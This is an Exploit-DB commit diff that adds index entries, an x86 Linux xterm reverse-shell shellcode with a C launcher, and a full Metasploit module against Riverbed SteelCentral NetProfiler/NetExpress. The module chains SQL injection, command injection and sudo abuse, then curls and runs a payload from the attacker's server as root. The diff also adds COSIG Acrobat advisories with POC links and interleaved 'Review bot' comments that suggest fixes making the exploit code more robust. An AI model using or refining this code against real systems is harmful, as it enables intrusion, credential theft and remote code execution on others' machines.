DB: 2016-07-14

17 new exploits

Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (2)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (3)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (4)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (5)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (6)
Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (7)
Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption
Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption
Adobe Flash Player 22.0.0.192 - TAG Memory Corruption
Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption

Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode
GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials
MS16-032 Secondary Logon Handle Privilege Escalation
Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution
Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities
Linux x86 Reverse Shell using Xterm  ///usr/bin/xterm -display 127.1.1.1:10
Offensive Security 2016-07-14 05:05:01 +00:00
parent 5cf8f533ae
commit 13e9ec719b
19 changed files with 1837 additions and 4 deletions


@ -11736,6 +11736,7 @@ id,file,description,date,author,platform,type,port
40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0 40089,platforms/multiple/dos/40089.txt,"Adobe Flash - LMZA Property Decoding Heap Corruption",2016-07-11,"Google Security Research",multiple,dos,0
40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0 40090,platforms/multiple/dos/40090.txt,"Adobe Flash - ATF Image Packing Overflow",2016-07-11,"Google Security Research",multiple,dos,0
40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80 40091,platforms/php/remote/40091.rb,"Tiki Wiki 15.1 - Unauthenticated File Upload Vulnerability (Metasploit)",2016-07-11,"Mehmet Ince",php,remote,80
40095,platforms/multiple/dos/40095.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption",2016-07-13,COSIG,multiple,dos,0
30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0 30170,platforms/php/webapps/30170.txt,"Beehive Forum 0.7.1 Links.php Multiple Cross-Site Scripting Vulnerabilities",2007-06-11,"Ory Segal",php,webapps,0
13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0 13260,platforms/bsdi_x86/shellcode/13260.c,"bsdi/x86 - execve /bin/sh toupper evasion (97 bytes)",2004-09-26,N/A,bsdi_x86,shellcode,0
13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0 13261,platforms/freebsd_x86/shellcode/13261.txt,"FreeBSD i386/AMD64 Execve /bin/sh - Anti-Debugging",2009-04-13,c0d3_z3r0,freebsd_x86,shellcode,0
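Review bot: the description for 40095 carries a stray space before the closing parenthesis in "Invalid Font (.ttf ) Memory Corruption"; the same string recurs in the other six Acrobat Reader rows added in this commit, so fix them together as "(.ttf)" rather than leaving the typo in the searchable title.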
@ -30539,6 +30540,9 @@ id,file,description,date,author,platform,type,port
33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0 33892,platforms/windows/local/33892.rb,".NET Deployment Service - IE Sandbox Escape (MS14-009)",2014-06-27,metasploit,windows,local,0
33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0 33893,platforms/windows/local/33893.rb,"Registry Symlink - IE Sandbox Escape (MS13-097)",2014-06-27,metasploit,windows,local,0
33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 33894,platforms/multiple/webapps/33894.txt,"Python CGIHTTPServer Encoded Path Traversal",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
40096,platforms/multiple/dos/40096.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (2)",2016-07-13,COSIG,multiple,dos,0
40097,platforms/multiple/dos/40097.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (3)",2016-07-13,COSIG,multiple,dos,0
40098,platforms/multiple/dos/40098.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (4)",2016-07-13,COSIG,multiple,dos,0
33896,platforms/php/webapps/33896.txt,"WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80 33896,platforms/php/webapps/33896.txt,"WordPress Simple Share Buttons Adder Plugin 4.4 - Multiple Vulnerabilities",2014-06-27,dxw,php,webapps,80
33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - CSRF Vulnerability",2014-06-27,"RedTeam Pentesting",multiple,webapps,0 33897,platforms/multiple/webapps/33897.txt,"Endeca Latitude 2.2.2 - CSRF Vulnerability",2014-06-27,"RedTeam Pentesting",multiple,webapps,0
33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0 33899,platforms/linux/local/33899.txt,"Chkrootkit 0.49 - Local Root Vulnerability",2014-06-28,"Thomas Stangner",linux,local,0
@ -31574,6 +31578,11 @@ id,file,description,date,author,platform,type,port
35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0 35056,platforms/hardware/webapps/35056.txt,"Dell EqualLogic Storage - Directory Traversal",2014-10-25,"XLabs Security",hardware,webapps,0
35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0 35057,platforms/php/webapps/35057.py,"Creative Contact Form (WordPress 0.9.7 and Joomla 2.0.0) - Shell Upload Vulnerability",2014-10-25,"Claudio Viviani",php,webapps,0
35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0 35058,platforms/bsd/dos/35058.c,"OpenBSD <= 5.5 - Local Kernel Panic",2014-10-25,nitr0us,bsd,dos,0
40099,platforms/multiple/dos/40099.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (5)",2016-07-13,COSIG,multiple,dos,0
40100,platforms/multiple/dos/40100.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (6)",2016-07-13,COSIG,multiple,dos,0
40101,platforms/multiple/dos/40101.txt,"Adobe Acrobat Reader DC 15.016.20045 - Invalid Font (.ttf ) Memory Corruption (7)",2016-07-13,COSIG,multiple,dos,0
40102,platforms/multiple/dos/40102.txt,"Adobe Flash Player 22.0.0.192 - DefineBitsJPEG2 Memory Corruption",2016-07-13,COSIG,multiple,dos,0
40103,platforms/multiple/dos/40103.txt,"Adobe Flash Player 22.0.0.192 - DefineSprite Memory Corruption",2016-07-13,COSIG,multiple,dos,0
35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090 35127,platforms/jsp/webapps/35127.txt,"Progress OpenEdge 11.2 - Directory Traversal",2014-10-31,"XLabs Security",jsp,webapps,9090
35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0 35060,platforms/php/webapps/35060.txt,"Aigaion 1.3.4 - 'ID' Parameter SQL Injection Vulnerability",2010-12-07,KnocKout,php,webapps,0
35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0 35061,platforms/linux/dos/35061.c,"GNU glibc 'regcomp()' Stack Exhaustion Denial Of Service Vulnerability",2010-12-07,"Maksymilian Arciemowicz",linux,dos,0
@ -35271,6 +35280,8 @@ id,file,description,date,author,platform,type,port
39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0 39020,platforms/windows/dos/39020.txt,"Adobe Flash TextField.gridFitType Setter - Use-After-Free",2015-12-17,"Google Security Research",windows,dos,0
39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 39021,platforms/windows/dos/39021.txt,"Adobe Flash MovieClip.lineStyle - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0 39022,platforms/windows/dos/39022.txt,"Adobe Flash GradientFill - Use-After-Frees",2015-12-17,"Google Security Research",windows,dos,0
40105,platforms/multiple/dos/40105.txt,"Adobe Flash Player 22.0.0.192 - TAG Memory Corruption",2016-07-13,COSIG,multiple,dos,0
40104,platforms/multiple/dos/40104.txt,"Adobe Flash Player 22.0.0.192 - SceneAndFrameData Memory Corruption",2016-07-13,COSIG,multiple,dos,0
39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0 39025,platforms/windows/dos/39025.txt,"Windows Kernel win32k!OffsetChildren - Null Pointer Dereference",2015-12-17,"Nils Sommer",windows,dos,0
39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0 39026,platforms/win32/dos/39026.txt,"win32k Desktop and Clipboard - Null Pointer Derefence",2015-12-17,"Nils Sommer",win32,dos,0
39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0 39027,platforms/win32/dos/39027.txt,"win32k Clipboard Bitmap - Use-After-Free Vulnerability",2015-12-17,"Nils Sommer",win32,dos,0
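Review bot: the two Flash Player rows are inserted in reverse id order (40105 before 40104); swap them so the csv keeps the ascending id sequence that the surrounding rows (39020 through 39022, then 39025 onwards) follow.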
@ -35919,6 +35930,7 @@ id,file,description,date,author,platform,type,port
39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443 39716,platforms/hardware/webapps/39716.py,"Gemtek CPE7000 / WLTCS-106 - Multiple Vulnerabilities",2016-04-21,"Federico Ramondino",hardware,webapps,443
39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0 39718,platforms/lin_x86-64/shellcode/39718.c,"Linux/x86_64 - bindshell (Port 5600) - 86 bytes",2016-04-21,"Ajith Kp",lin_x86-64,shellcode,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0 39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7-10 & Server 2008-2012 (x32/x64) - Local Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
40094,platforms/win32/shellcode/40094.c,"Windows x86 URLDownloadToFileA()+SetFileAttributesA()+WinExec()+ExitProcess() Shellcode",2016-07-13,"Roziul Hasan Khan Shifat",win32,shellcode,0
39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0 39720,platforms/jsp/webapps/39720.txt,"Totemomail 4.x / 5.x - Persistent XSS",2016-04-25,Vulnerability-Lab,jsp,webapps,0
39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0 39721,platforms/ios/webapps/39721.txt,"C/C++ Offline Compiler and C For OS - Persistent XSS",2016-04-25,Vulnerability-Lab,ios,webapps,0
39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0 39722,platforms/lin_x86/shellcode/39722.c,"Linux x86 Reverse TCP Shellcode (ipv6)",2016-04-25,"Roziul Hasan Khan Shifat",lin_x86,shellcode,0
@ -36256,3 +36268,8 @@ id,file,description,date,author,platform,type,port
40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052 40077,platforms/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - XXE Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,xml,webapps,3052
40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80 40078,platforms/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,php,webapps,80
40079,platforms/lin_x86-64/shellcode/40079.c,"Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes",2016-07-11,CripSlick,lin_x86-64,shellcode,0 40079,platforms/lin_x86-64/shellcode/40079.c,"Linux x86-64 Continuously-Probing Reverse Shell via Socket + Port-range + Password - 172 Bytes",2016-07-11,CripSlick,lin_x86-64,shellcode,0
40106,platforms/windows/webapps/40106.txt,"GSX Analyzer 10.12 and 11 - Main.swf Hardcoded Superadmin Credentials",2016-07-13,ndevnull,windows,webapps,0
40107,platforms/windows/local/40107.rb,"MS16-032 Secondary Logon Handle Privilege Escalation",2016-07-13,metasploit,windows,local,0
40108,platforms/linux/remote/40108.rb,"Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",2016-07-13,metasploit,linux,remote,443
40109,platforms/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple CSRF Vulnerabilities",2016-07-13,"Julien Ahrens",xml,webapps,0
40110,platforms/lin_x86/shellcode/40110.c,"Linux x86 Reverse Shell using Xterm ///usr/bin/xterm -display 127.1.1.1:10",2016-07-13,RTV,lin_x86,shellcode,0
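Review bot: the 40110 description embeds the author's test command line, "///usr/bin/xterm -display 127.1.1.1:10", loopback address included, in the title field; the neighbouring shellcode rows such as 40079 (and 39718 further up) use a descriptive title plus byte count instead, so a title along the lines of "Linux x86 - xterm Reverse Shell Shellcode (68 bytes)" would match the csv convention and keep the file's own 127.1.1.1 placeholder out of the index.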


@ -0,0 +1,78 @@
/*
# Title : Linux , Reverse Shell using Xterm , ///usr/bin/xterm -display 127.1.1.1:10
# Date : 12-07-2016
# Author : RTV
# Tested On : Ubuntu x86
# shellcode : \x31\xc0\x31\xd2\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80
*/
/*
;**********************************
;xterm.asm
;xterm reverse shell , 32 bit Linux
;nasm -f elf32 -o xterm.o xterm.asm && ld -o xtermrev xterm.o
;Shellcode length 68
section .text
global _start
_start:
xor eax,eax
xor edx,edx
push eax
push 0x30313a31 ; setting the listening IP and display , used 127.1.1.1:10 , change this section to set your IP
push 0x2e312e31
push 0x2e373231
mov esi,esp
push eax
push 0x79616c70 ; -display
push 0x7369642d
mov edi,esp
push eax
push 0x6d726574 ; ///usr/bin/xterm
push 0x782f6e69
push 0x622f7273
push 0x752f2f2f
mov ebx,esp
push eax
push esi
push edi
push ebx
mov ecx,esp
mov al,11
int 0x80
;**********************************
/** shellcode.c , gcc -fno-stack-protector -z execstack -o xtermrev shellcode.c
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x31\xd2\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}
/***************************
Notes : -
Xterm reverse shell
Use these commands to listen at your side
Xnest :10 ( starting Xserver with display 10)
xhost +targetip ( authorize the target ip to connect back)
# SLAE - 739
*/
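Review bot: in shellcode.c at the end of the hunk, `main()` has no return type and `strlen(code)` (a size_t) is printed with `%d`; recent gcc versions reject implicit int and warn on the format mismatch, so use `int main(void)` and `printf("Shellcode Length: %zu\n", strlen(code));`. The "Shellcode length 68" comment in the NASM listing does match the 68 escaped bytes in the header, and because the string contains no null byte the strlen-based length report is accurate here. One readability point in the asm: the comments `; -display` and `; ///usr/bin/xterm` sit on the first push of each string, which is the string's tail (`0x79616c70` is "play", `0x6d726574` is "term"); a reader following the stack build-up would find them less confusing on the final push of each group (`0x752f2f2f` is "///u").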

platforms/linux/remote/40108.rb Executable file

@ -0,0 +1,318 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
include Msf::Exploit::FileDropper
require 'digest'
def initialize(info={})
super(update_info(info,
'Name' => "Riverbed SteelCentral NetProfiler/NetExpress Remote Code Execution",
'Description' => %q{
This module exploits three separate vulnerabilities found in the Riverbed SteelCentral NetProfiler/NetExpress
virtual appliances to obtain remote command execution as the root user. A SQL injection in the login form
can be exploited to add a malicious user into the application's database. An attacker can then exploit a
command injection vulnerability in the web interface to obtain arbitrary code execution. Finally, an insecure
configuration of the sudoers file can be abused to escalate privileges to root.
},
'License' => MSF_LICENSE,
'Author' => [ 'Francesco Oddo <francesco.oddo[at]security-assessment.com>' ],
'References' =>
[
[ 'URL', 'http://www.security-assessment.com/files/documents/advisory/Riverbed-SteelCentral-NetProfilerNetExpress-Advisory.pdf' ]
],
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'Stance' => Msf::Exploit::Stance::Aggressive,
'Targets' =>
[
[ 'Riverbed SteelCentral NetProfiler 10.8.7 / Riverbed NetExpress 10.8.7', { }]
],
'DefaultOptions' =>
{
'SSL' => true
},
'Privileged' => false,
'DisclosureDate' => "Jun 27 2016",
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The target URI', '/']),
OptString.new('RIVERBED_USER', [true, 'Web interface user account to add', 'user']),
OptString.new('RIVERBED_PASSWORD', [true, 'Web interface user password', 'riverbed']),
OptInt.new('HTTPDELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]),
Opt::RPORT(443)
],
self.class
)
end
def check
json_payload_check = "{\"username\":\"check_vulnerable%'; SELECT PG_SLEEP(2)--\", \"password\":\"pwd\"}";
# Verifies existence of login SQLi
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_check
})
if res && res.body && res.body.include?('AUTH_DISABLED_ACCOUNT')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Attempting log in to target appliance")
@sessid = do_login
print_status("Confirming command injection vulnerability")
test_cmd_inject
vprint_status('Ready to execute payload on appliance')
@elf_sent = false
# Generate payload
@pl = generate_payload_exe
if @pl.nil?
fail_with(Failure::BadConfig, 'Please select a valid Linux payload')
end
# Start the server and use primer to trigger fetching and running of the payload
begin
Timeout.timeout(datastore['HTTPDELAY']) { super }
rescue Timeout::Error
end
end
def get_nonce
# Function to get nonce from login page
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path,'/index.php'),
})
if res && res.body && res.body.include?('nonce_')
html = res.get_html_document
nonce_field = html.at('input[@name="nonce"]')
nonce = nonce_field.attributes["value"]
else
fail_with(Failure::Unknown, 'Unable to get login nonce.')
end
# needed as login nonce is bounded to preauth SESSID cookie
sessid_cookie_preauth = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
return [nonce, sessid_cookie_preauth]
end
def do_login
uname = datastore['RIVERBED_USER']
passwd = datastore['RIVERBED_PASSWORD']
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
# Exploit login SQLi if credentials are not valid.
if res && res.body && res.body.include?('<form name="login"')
print_status("Invalid credentials. Creating malicious user through login SQLi")
create_user
nonce, sessid_cookie_preauth = get_nonce
post_data = "login=1&nonce=#{nonce}&uname=#{uname}&passwd=#{passwd}"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php'),
'cookie' => "SESSID=#{sessid_cookie_preauth}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
else
print_status("Valid login credentials provided. Successfully logged in")
sessid_cookie = (res.get_cookies || '').scan(/SESSID=(\w+);/).flatten[0] || ''
print_status("Saving login credentials into Metasploit DB")
report_cred(uname, passwd)
end
return sessid_cookie
end
def report_cred(username, password)
# Function used to save login credentials into Metasploit database
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
def create_user
# Function exploiting login SQLi to create a malicious user
username = datastore['RIVERBED_USER']
password = datastore['RIVERBED_PASSWORD']
usr_payload = generate_sqli_payload(username)
pwd_hash = Digest::SHA512.hexdigest(password)
pass_payload = generate_sqli_payload(pwd_hash)
uid = rand(999)
json_payload_sqli = "{\"username\":\"adduser%';INSERT INTO users (username, password, uid) VALUES ((#{usr_payload}), (#{pass_payload}), #{uid});--\", \"password\":\"pwd\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_sqli
})
json_payload_checkuser = "{\"username\":\"#{username}\", \"password\":\"#{password}\"}";
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/api/common/1.0/login'),
'ctype' => 'application/json',
'encode_params' => false,
'data' => json_payload_checkuser
})
if res && res.body && res.body.include?('session_id')
print_status("User account successfully created, login credentials: '#{username}':'#{password}'")
else
fail_with(Failure::UnexpectedReply, 'Unable to add user to database')
end
end
def generate_sqli_payload(input)
# Function to generate sqli payload for user/pass in expected format
payload = ''
input_array = input.strip.split('')
for index in 0..input_array.length-1
payload = payload << 'CHR(' + input_array[index].ord.to_s << ')||'
end
# Gets rid of the trailing '||' and newline
payload = payload[0..-3]
return payload
end
def test_cmd_inject
post_data = "xjxfun=get_request_key&xjxr=1457064294787&xjxargs[]=Stoken; id;"
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => post_data
})
unless res && res.body.include?('uid=')
fail_with(Failure::UnexpectedReply, 'Could not inject command, may not be vulnerable')
end
end
def cmd_inject(cmd)
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri.path,'/index.php?page=licenses'),
'cookie' => "SESSID=#{@sessid}",
'ctype' => 'application/x-www-form-urlencoded',
'encode_params' => false,
'data' => cmd
})
end
# Deliver payload to appliance and make it run it
def primer
# Gets the autogenerated uri
payload_uri = get_uri
root_ssh_key_private = rand_text_alpha_lower(8)
binary_payload = rand_text_alpha_lower(8)
print_status("Privilege escalate to root and execute payload")
privesc_exec_cmd = "xjxfun=get_request_key&xjxr=1457064346182&xjxargs[]=Stoken; sudo -u mazu /usr/mazu/bin/mazu-run /usr/bin/sudo /bin/date -f /opt/cascade/vault/ssh/root/id_rsa | cut -d ' ' -f 4- | tr -d '`' | tr -d \"'\" > /tmp/#{root_ssh_key_private}; chmod 600 /tmp/#{root_ssh_key_private}; ssh -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no -i /tmp/#{root_ssh_key_private} root@localhost '/usr/bin/curl -k #{payload_uri} -o /tmp/#{binary_payload}; chmod 755 /tmp/#{binary_payload}; /tmp/#{binary_payload}'"
cmd_inject(privesc_exec_cmd)
register_file_for_cleanup("/tmp/#{root_ssh_key_private}")
register_file_for_cleanup("/tmp/#{binary_payload}")
vprint_status('Finished primer hook, raising Timeout::Error manually')
raise(Timeout::Error)
end
#Handle incoming requests from the server
def on_request_uri(cli, request)
vprint_status("on_request_uri called: #{request.inspect}")
print_status('Sending the payload to the server...')
@elf_sent = true
send_response(cli, @pl)
end
end
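Review bot: in do_login, the else branch (after the `<form name="login"` check) calls `res.get_cookies` without first checking that `res` is non-nil, so a dropped connection on the login POST surfaces as a NoMethodError rather than a clean `fail_with(Failure::Unreachable, ...)`; `test_cmd_inject` has the same gap, since `res && res.body.include?('uid=')` raises when `body` is nil. Two metadata points: `'Privileged' => false` contradicts the description, which says the module finishes as root via the sudoers misconfiguration, so it should be `true`; and `require 'digest'` sits inside the class body after the mixins, whereas framework convention keeps requires at the top next to `require 'msf/core'`. Minor style: the `for index in 0..input_array.length-1` loop in generate_sqli_payload is non-idiomatic Ruby and can be `input.strip.each_char.map { |c| "CHR(#{c.ord})" }.join('||')`, which also removes the `payload[0..-3]` trim, and `@elf_sent` is assigned in exploit and on_request_uri but never read.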


@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4205
# COSIG-2016-30
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
Adobe Acrobat is a family of application software and Web services developed by Adobe Systems to view, create, manipulate, print and manage files in Portable Document Format (PDF).
(https://en.wikipedia.org/wiki/Adobe_Acrobat)
#####################################################################################
====================
2) Report Timeline
====================
2016-05-18: Sébastien Morin and Pier-Luc Maltais of COSIG report this vulnerability to Adobe PSIRT;
2016-06-08: Adobe PSIRT confirm this vulnerability;
2016-07-12: Adobe fixed the issue (APSB16-26);
2016-07-12: Advisory released by COSIG;
#####################################################################################
=====================
3) Technical details
=====================
The vulnerability allows a remote attacker to execute malicious code or access to part of dynamically allocated memory using a user interaction
that opens a specially crafted PDF file containing an invalid font (.ttf ) including invalid data.
#####################################################################################
===========
4) POC
===========
https://cosig.gouv.qc.ca/wp-content/uploads/2016/07/COSIG-2016-30.pdf
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40095.zip
####################################################################################
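Review bot: section 3 (Technical details) names no affected component, font table or crash type, so this advisory and the other COSIG Acrobat Reader advisories in this commit differ only in their CVE and COSIG ids and in the POC links, and a reader cannot tell which parsing path each one covers or how they relate. Also, "Versions: 15.016.20045 and earlier" gives the affected range but not the patched build that APSB16-26 introduces, which is the detail a defender checking deployed versions needs; and "Adobe PSIRT confirm this vulnerability" should read "confirms".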


@ -0,0 +1,56 @@
#####################################################################################
# Application: Adobe Acrobat Reader DC
# Platforms: Windows,OSX
# Versions: 15.016.20045 and earlier
# Author: Sébastien Morin and Pier-Luc Maltais of COSIG
# Website: https://cosig.gouv.qc.ca/en/advisory/
# Twitter: @COSIG_
# Date: July 12, 2016
# CVE: CVE-2016-4204
# COSIG-2016-29
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
================
1) Introduction
================
